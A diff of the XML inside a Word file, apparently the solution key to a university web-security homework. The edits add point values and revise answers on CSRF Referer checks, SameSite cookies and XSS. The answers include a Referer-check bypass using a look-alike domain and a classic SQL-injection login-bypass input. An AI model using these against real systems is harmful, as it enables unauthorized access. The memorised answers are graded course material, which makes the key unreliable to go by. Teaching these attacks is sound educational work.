+++ b/teaching/ITIS6200/2023fa/lectures/assignments/Homework3.solution.docx
@@ -230,7 +230,13 @@
         <w:t xml:space="preserve">.1: </w:t>
       </w:r>
       <w:r>
-        <w:t>Write a set of access control lists for this situation. Which list is associated with while file?</w:t>
+        <w:t xml:space="preserve">Write a set of access control lists for this situation. Which list is associated with </w:t>
+      </w:r>
+      <w:r>
+        <w:t>which</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> file?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -600,6 +606,9 @@
       <w:r>
         <w:t xml:space="preserve"> justification. </w:t>
       </w:r>
+      <w:r>
+        <w:t>(4 points)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -838,6 +847,9 @@
       <w:r>
         <w:t xml:space="preserve">and its subdomains. </w:t>
       </w:r>
+      <w:r>
+        <w:t>(4 points)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -931,6 +943,9 @@
       <w:r>
         <w:t xml:space="preserve">ensure that cookies are only transmitted encrypted? </w:t>
       </w:r>
+      <w:r>
+        <w:t>(4 points)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1041,6 +1056,9 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:t>(4 points)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1344,6 +1362,9 @@
         </w:rPr>
         <w:t xml:space="preserve">How can it help defend against cookie related attacks? </w:t>
       </w:r>
+      <w:r>
+        <w:t>(4 points)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1707,6 +1728,9 @@
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Explain what could happen when Alice visits the chat forum and views Mallory’s comment. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(6 points)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2038,6 +2062,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">If </w:t>
       </w:r>
       <w:r>
@@ -2108,6 +2133,9 @@
       <w:r>
         <w:t xml:space="preserve">?   </w:t>
       </w:r>
+      <w:r>
+        <w:t>(6 points)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2121,7 +2149,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Ans: </w:t>
       </w:r>
       <w:r>
@@ -2155,7 +2182,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Q </w:t>
@@ -2167,9 +2194,302 @@
         <w:t xml:space="preserve">.3: </w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve">Suppose </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">bank.com decides to defend against CSRF attacks by checking if the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Referer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="SimSun"/>
         </w:rPr>
+        <w:t xml:space="preserve"> header </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">contains </w:t>
+      </w:r>
+      <w:r>
+        <w:t>a string “</w:t>
+      </w:r>
+      <w:r>
+        <w:t>bank.com</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="SimSun"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">If </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the chat forum has </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">domain </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>evil.com</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, c</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">an </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">CSRF attack </w:t>
+      </w:r>
+      <w:r>
+        <w:t>succeed</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">? </w:t>
+      </w:r>
+      <w:r>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">f the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">chat forum has domain </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>evil.bank.com</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, c</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">an </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">CSRF attack </w:t>
+      </w:r>
+      <w:r>
+        <w:t>succeed</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">? </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Describe one way Mallory can modify her attack to always get around this check</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(6 points)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: If the chat has domain evil.com: the attack won’t succeed, since the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>Referer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> head would </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>be ”</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">evil.com”, and doesn’t match “bank.com”;  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">If the chat has domain evil.bank.com: the attack would succeed, since the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>Referer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> head would </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>be ”</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">evil.bank.com”, and it contains “bank.com”;  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mallory can direct the victim to a website that contains </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>“bank.com”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, such as </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>bank.com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>.edu.xxx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”;  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Q</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve">Suppose </w:t>
       </w:r>
       <w:r>
@@ -2181,55 +2501,48 @@
         <w:t>bank.com</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="SimSun"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="SimSun"/>
-        </w:rPr>
         <w:t>decides to defend against CSRF attacks</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="SimSun"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> by checking if the </w:t>
+        <w:t xml:space="preserve"> with </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">an additional cookie field </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:eastAsia="SimSun"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Referer</w:t>
+        <w:t>SameSite</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="SimSun"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> header </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">contains </w:t>
-      </w:r>
-      <w:r>
-        <w:t>a string “</w:t>
-      </w:r>
-      <w:r>
-        <w:t>bank.com</w:t>
-      </w:r>
-      <w:r>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="SimSun"/>
-        </w:rPr>
+        <w:t xml:space="preserve">. When </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SameSite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=strict, the browser will only send the cookie if</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the domain of the cookie exactly matches the domain of the origin</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
@@ -2301,268 +2614,16 @@
         <w:t xml:space="preserve">? </w:t>
       </w:r>
       <w:r>
-        <w:t>Describe one way Mallory can modify her attack to always get around this check</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ans: If the chat has domain evil.com: the attack won’t succeed, since the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>Referer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> head would </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>be ”</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve">evil.com”, and doesn’t match “bank.com”;  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve">If the chat has domain evil.bank.com: the attack would succeed, since the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>Referer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> head would </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>be ”</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve">evil.bank.com”, and it contains “bank.com”;  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Q</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> points)</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Suppose </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Courier New"/>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>bank.com</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>decides to defend against CSRF attacks</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> with </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">an additional cookie field </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>SameSite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. When </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>SameSite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=strict, the browser will only send the cookie if</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>the domain of the cookie exactly matches the domain of the origin</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">If </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the chat forum has </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">domain </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>evil.com</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, c</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">an </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">CSRF attack </w:t>
-      </w:r>
-      <w:r>
-        <w:t>succeed</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">? </w:t>
-      </w:r>
-      <w:r>
-        <w:t>I</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">f the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">chat forum has domain </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>evil.bank.com</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, c</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">an </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">CSRF attack </w:t>
-      </w:r>
-      <w:r>
-        <w:t>succeed</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">?  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3495,6 +3556,9 @@
         </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
+      <w:r>
+        <w:t>(6 points)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3602,6 +3666,9 @@
       <w:r>
         <w:t xml:space="preserve"> runs, what origin does it has? </w:t>
       </w:r>
+      <w:r>
+        <w:t>(6 points)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3653,6 +3720,9 @@
         </w:rPr>
         <w:t xml:space="preserve">Q 4.3: Can we use XSS to steal information in Cookies? If yes, how can we defend against that? </w:t>
       </w:r>
+      <w:r>
+        <w:t>(6 points)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3668,7 +3738,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Ans: yes. </w:t>
       </w:r>
       <w:r>
@@ -3762,6 +3831,15 @@
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
         <w:t xml:space="preserve">than can transfer $1000 to Mallory. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> points)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4906,6 +4984,15 @@
         </w:rPr>
         <w:t xml:space="preserve">.  </w:t>
       </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> points)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4923,6 +5010,14 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">There are many possible answers. For examples, </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5167,6 +5262,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>If the query returns the details of a user, then the login is successful. Otherwise, it is rejected.</w:t>
       </w:r>
     </w:p>
@@ -5186,6 +5282,15 @@
         </w:rPr>
         <w:t>Design an input that would bypass the password check.</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(10 points)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5214,31 +5319,31 @@
         </w:rPr>
         <w:t xml:space="preserve">Ans: </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>There are many possible answers. For example,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">First input: </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Alice</w:t>
+        <w:t>First input: Alice</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5254,25 +5359,23 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>OR</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Second input: some </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5280,7 +5383,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>password</w:t>
+        <w:t>'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5288,8 +5391,74 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
